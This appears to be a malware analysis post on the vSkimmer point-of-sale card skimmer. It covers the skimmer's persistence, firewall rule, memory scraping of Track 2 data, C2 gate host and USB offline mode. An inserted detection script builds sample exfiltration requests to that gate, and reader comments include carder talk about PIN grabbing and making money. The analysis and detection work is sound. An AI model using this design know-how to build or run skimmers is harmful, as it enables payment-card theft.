vSkimmer - Virtual Skimmer
Functions:
- Track 2 grabber
- HTTP Loader (Download & Execute)
- Update bot itself
Working Modes:
- Online: If the internet is reachable it will try to bypass firewalls and communicate with the control panel.
- Offline: If the internet is not reachable it waits for a specific pendrive/flashdrive to be plugged in and copies logs to it.
Server coded in PHP (can be modified on request to send logs to a remote server, via SMTP, etc.)
Client coded in C++, no dependencies, 66kb, cryptable. (can be customized)
The malware checks for the presence of a debugger:
Get PC details (OS, computer name, a GUID to identify the machine in the POS botnet, etc.):
Check if the file is executed from %APPDATA%; if not, add registry persistence and a firewall rule, make a copy and execute the copy:
Detail of the registry persistence:
Firewall rule to allow the malware:
Create a mutex and a thread, and get host information:
Check for processes:
Some are whitelisted: "System", smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, spoolsv.exe, wscntfy.exe, alg.exe, mscorsvw.exe, ctfmon.exe, explorer.exe:
And when a process is finally found:
Read the process memory and search for the pattern:
If nothing is found:
Get info, Base64-encode it and call the gate via a GET request:
Answer:
• dns: 1 ›› ip: 31.31.196.44 - adresse: WWW.POSTERMINALWORLD.LA
Parse the answer:
The answer is reduced to its first 3 letters and compared with 'dlx' (Download & Execute) and 'upd' (Update); if one of these is found, it means the bad guys sent us an order.
For example, dlx:
The order is executed and a response is sent to the server:
The part I love with POS malware:
So the algorithm detects the pattern, and the Track 2 data is encoded to Base64
and sent to the panel:
Now for the offline mode, get the drive:
The flash drive must be named "KARTOXA007" ("kartoxa" means dumps in Russian)
Create dmpz.log:
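The client behaviour described above (copy run from %APPDATA% with registry persistence and a firewall rule, process memory scanned for Track 2 data, Base64 GET to the gate, dmpz.log dropped on a removable drive) gives a defender several observable points. The following detection sketch is an added example, not code from the post, from the sample or from the vSkimmer panel: it runs a few host-side rules over constructed Sysmon-style events and a few network-side rules over constructed proxy lines, and decodes Base64 query strings to check whether they carry Track 2 records, using a Luhn check to separate real PANs from digit noise. The event layout, the binary name svc.exe, the Run-key path and the gate.php path are assumptions for the sake of the example; the gate host is the one resolved in the DNS answer above. The "KARTOXA007" volume label is not visible in a file-create event, so the offline-mode rule keys on the dmpz.log file name instead.

```python
import base64
import re

# Constructed Sysmon-style host events modelled on the behaviours described
# above (Run-key persistence, firewall rule, dmpz.log on a removable drive).
# These are not real logs from the analysed sample; svc.exe is a made-up name.
HOST_EVENTS = [
    "EventID=13 Image=C:\\Users\\pos\\AppData\\Roaming\\svc.exe "
    "TargetObject=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svc",
    "EventID=1 Image=C:\\Windows\\System32\\netsh.exe CommandLine=netsh firewall "
    "add allowedprogram C:\\Users\\pos\\AppData\\Roaming\\svc.exe svc ENABLE",
    "EventID=11 Image=C:\\Users\\pos\\AppData\\Roaming\\svc.exe TargetFilename=E:\\dmpz.log",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe",
]


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# gate.php is a hypothetical path; the host is the one from the DNS answer above.
GATE = "http://WWW.POSTERMINALWORLD.LA/gate.php?data="
PROXY_LINES = [  # constructed proxy log lines, one request per line
    # Track 2 layout around the well-known Luhn-valid test PAN 4111 1111 1111 1111
    "GET " + GATE + _b64(";4111111111111111=25121011234567890123?"),
    # the placeholder track quoted in the comments: right layout, PAN fails Luhn
    "GET " + GATE + _b64(";1234567891234567=12345678912345678900?"),
    # benign base64 parameter ("hello") to an unrelated host
    "GET http://example.test/index.html?data=aGVsbG8=",
]

C2_HOST = "www.posterminalworld.la"
EVENT_ID = re.compile(r"^EventID=(\d+)")
APPDATA_EXE = re.compile(r"\\AppData\\Roaming\\[^\\\s]+\.exe", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
DMPZ_LOG = re.compile(r"TargetFilename=([A-Z]):\\dmpz\.log", re.IGNORECASE)
DATA_PARAM = re.compile(r"[?&]data=([A-Za-z0-9+/=]+)")
# Track 2: ';' start sentinel, 13-19 digit PAN, '=' separator, YYMM expiry,
# 3-digit service code, discretionary data, '?' end sentinel.
TRACK2 = re.compile(r";(\d{13,19})=(\d{4})(\d{3})\d*\?")


def luhn_ok(pan: str) -> bool:
    """Mod-10 check: tells real PANs from digit runs that merely look like one."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_track2(text: str):
    """Return (pan, luhn_valid) for every Track 2 record found in text."""
    return [(m.group(1), luhn_ok(m.group(1))) for m in TRACK2.finditer(text)]


def host_indicators(event: str):
    """Name the vSkimmer-style behaviours a single host event matches."""
    hits = []
    eid = EVENT_ID.match(event)
    eid = eid.group(1) if eid else ""
    low = event.lower()
    if eid == "13" and RUN_KEY.search(event) and APPDATA_EXE.search(event):
        hits.append("Run-key persistence for a binary under %APPDATA%")
    if eid == "1" and "netsh" in low and "firewall" in low and APPDATA_EXE.search(event):
        hits.append("firewall allow rule for a binary under %APPDATA%")
    m = DMPZ_LOG.search(event)
    if eid == "11" and m:
        hits.append(f"dmpz.log written to drive {m.group(1).upper()}:")
    return hits


def proxy_indicators(line: str):
    """Flag gate traffic and base64 query strings that decode to Track 2 data."""
    hits = []
    url = line.split(" ", 1)[-1]
    host = re.match(r"https?://([^/:]+)", url)
    if host and host.group(1).lower() == C2_HOST:
        hits.append("GET to known gate host " + C2_HOST)
    for value in DATA_PARAM.findall(url):
        try:
            decoded = base64.b64decode(value, validate=True).decode("latin-1")
        except ValueError:      # binascii.Error is a ValueError subclass
            continue
        for pan, ok in find_track2(decoded):
            hits.append(f"Track 2 data in base64 query (PAN ****{pan[-4:]}, Luhn {'ok' if ok else 'fail'})")
    return hits


def scan(host_events=HOST_EVENTS, proxy_lines=PROXY_LINES):
    """Run both rule sets and return (source, indicator) pairs."""
    alerts = [("host", h) for ev in host_events for h in host_indicators(ev)]
    alerts += [("proxy", h) for ln in proxy_lines for h in proxy_indicators(ln)]
    return alerts


if __name__ == "__main__":
    for source, alert in scan():
        print(f"[{source}] {alert}")
```

Running the block prints seven alerts: three host-side (persistence, firewall rule, dmpz.log on E:) and four network-side (two gate requests, each carrying a Base64 Track 2 record, one Luhn-valid and one not). The Luhn result is reported rather than used as a filter on purpose: a skimmer that dumps everything shaped like a track will also ship junk, and a request to the gate host is worth an alert regardless of what the payload decodes to.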
Now let's have a look at the panel:
POS Terminals:
Dump download:
Commands:
Settings:
Dumped.. :)
Sample:
https://www.virustotal.com/file/bb12fc4943857d8b8df1ea67eecc60a8791257ac3be12ae44634ee559da91bc0/analysis/1358237597/
Unpack:
https://www.virustotal.com/file/4fba64ad3a7e1daf8ca2d65c3f9b03a49083b7af339b995422c01a1a96532ca3/analysis/1358238314/
Thanks Zora for the sample :)
what forum is shown in this post?

I want to make money too :) but I don't know how :( and what way to choose

Get a real job. :)

Congrats Xyli or Zora and company!

Now we know kaddafi.me and his shit forum lampeduza is more likely a sting. Have much fun, just tell these guys how you got it, because you didn't hack anything. That was easy man, you were right, Dumped vpos_good.7z he he, Anyway sent you old stripped version and bugged.
I'm luving it, learning new things is always appreciated.
Much love to mossad or whoever you are... later

not my fault if you are stupid enough to get fooled by a scammer.

btw he didn't give it to me, Zora got the bin and I remounted from posterminal.la with a tar.gz on it and several other vulns but I'm not here to talk about how I got the (lame) package.

has a forum where a Russian underground carder sells vSkimmer; it installs and makes the entire process, price to match. I found it very interesting because he had it installed on a POS terminal.

This honestly was very upsetting and not impressive at all, I'm sure we all expected better; perhaps the next piece of malware relating to POS will actually be worth looking into in greater detail lol.

yup Zora, claiming to be better than Dexter but I've not seen where it's better.

Does this botnet (vSkimmer) have a PIN card grabber function??????

This POS software can't grab PINs if I remember correctly.

"Or just a simple ";1234567891234567=12345678912345678900?" in a txt but it's more gangsta to swipe a card."

Haha, this made me laugh. Good work Xyli! :)

you can get PIN CARD hacking security cam system /m/

U really made money from this using grabbed CC?